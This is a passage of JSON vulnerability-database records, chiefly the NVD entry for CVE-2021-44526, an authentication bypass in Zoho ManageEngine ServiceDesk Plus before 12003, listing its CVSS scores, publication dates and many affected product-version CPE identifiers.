"CNVD-2021-94846", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-94846", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-07-13T18:03:12", "description": "Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T15:15:00", "type": "cve", "title": "CVE-2021-44526", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44526"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:zohocorp:manageengine_servicedesk_plus:12.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus:10.5", "cpe:/a:zohocorp:manageengine_servicedesk_plus:8.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:8.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.4", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.3", "cpe:/a:zohocorp:manageengine_servicedesk_plus:10.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus:10.0.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.3"], "id": "CVE-2021-44526", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44526", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9229:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9419:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9241:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11308:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11135:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9233:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11130:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9416:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9237:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11131:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9317:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11130:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11131:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9027:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9023:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11127:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9231:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10021:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9041:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9222:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9048:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9235:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10014:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9014:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10017:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9331:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9043:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11126:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9311:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10019:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11129:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11141:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9327:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11307:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9400:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9320:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9309:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9030:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9017:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9016:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9217:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11306:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9226:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11126:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9314:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9032:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9335:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9031:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9236:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11142:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9022:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9045:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10016:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9402:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9323:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9333:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11129:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9415:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8213:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9421:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9018:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9039:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9213:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9047:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9420:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9409:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9407:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9318:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9422:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9029:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11309:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9326:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9401:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9223:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9325:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9224:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8217:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10015:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9024:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9221:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9423:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9306:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9408:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9028:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9238:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9242:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9330:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11138:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9042:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9230:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9049:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9329:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9322:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11127:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9424:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9036:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9046:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11132:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9310:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9307:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9308:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9328:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9240:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9412:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9218:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9019:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11147:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9220:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9021:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9332:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11146:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9040:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9313:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9038:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11135:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9427:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9035:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9316:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11122:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9334:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9225:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9219:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11132:*:*:*:*:*:*", 